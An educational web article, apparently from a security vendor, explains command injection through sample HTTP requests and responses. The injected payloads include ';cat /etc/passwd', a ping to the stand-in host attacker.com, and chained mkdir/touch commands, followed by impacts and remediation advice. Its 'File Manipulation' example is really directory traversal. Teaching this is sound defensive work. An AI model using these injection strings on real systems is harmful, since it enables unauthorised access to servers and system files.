Command Injection
The injected command runs with the application’s privileges, which can enable attackers to carry out numerous harmful activities, such as:
- Accessing or altering files on the server.
- Running arbitrary system commands.
- Changing or erasing data within the application’s database.
- Elevating their privileges to take over the entire system.
How Command Injection Works?
Command Injection vulnerabilities arise when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell or operating system command. This vulnerability allows an attacker to append, alter, or insert new commands into the original command, leading to the execution of unintended commands on the server.
Command Injection Examples
- Simple Command Injection
This occurs when user input is directly included in a system command without proper sanitization.
Request Example:
GET /vulnerable.php?user=admin;cat /etc/passwd HTTP/1.1\
Host: example.com
Response:
HTTP/1.1 200 OK
...
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
Here, the user parameter is included in a shell command, and the attacker appends ;cat /etc/passwd
to read the system’s password file.
- Blind Command Injection
This type occurs when the application does not return the output of the command, making it harder for the attacker to see the results. However, the attack can still be verified by observing side effects.
Request Example:
GET /vulnerable.php?user=admin;ping -c 1 attacker.com HTTP/1.1
Host: example.com
Response:
HTTP/1.1 200 OK
...
Welcome, admin!
Although the response does not show the output of the ping command, the attacker can check if the ping request reached attacker.com to confirm the vulnerability.
- Chained Commands
This type involves chaining multiple commands together to perform a series of actions.
Request Example:
GET /vulnerable.php?user=admin; mkdir /tmp/hack; touch /tmp/hack/injected HTTP/1.1
Host: example.com
Response:
HTTP/1.1 200 OK
...
Welcome, admin!
The attacker creates a directory /tmp/hack and a file injected within it, indicating the ability to execute multiple commands.
- File Manipulation
This type involves manipulating files on the system, such as creating, modifying, or deleting files.
Request Example:
GET /vulnerable.php?file=../../../../etc/passwd HTTP/1.1
Host: example.com
Response:
HTTP/1.1 200 OK
...
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
The attacker uses directory traversal to access the system’s password file.
Impacts of Command Injection
Command Injection vulnerabilities can lead to severe consequences, including:
- Data Theft: Attackers can access sensitive information stored on the server.
- System Compromise: Attackers can gain control over the server, potentially leading to a full system compromise.
- Service Disruption: Attackers can execute commands that disrupt the normal operation of the application or server.
- Lateral Movement: Attackers can use the compromised server to launch attacks on other systems within the network
Remediation of Command Injection
To effectively mitigate Command Injection vulnerabilities, organizations should implement the following measures:
- Input Validation: Rigorously validate and sanitize all user inputs to ensure they do not contain any malicious content.
- Use Safe APIs: Prefer using safe APIs that do not involve system shell commands. For example, use database APIs instead of invoking shell commands to interact with databases.
- Parameterization: Use parameterized queries or prepared statements to prevent user input from being treated as executable code.
- Least Privilege Principle: Ensure that the application and any executed commands run with the least privileges necessary to reduce the impact of a potential compromise.
Conclusion
Command Injection is a critical security vulnerability that can lead to severe consequences, including data theft, system compromise, and service disruption. By understanding the mechanisms behind these attacks and implementing robust security measures, organizations can protect their web applications from these threats. Regular security testing, strict input validation, and the use of safe APIs are crucial steps in mitigating the risks associated with Command Injection.
Ready to see for yourself?
Test drives all platform features for yourself. No commitment and No credit card!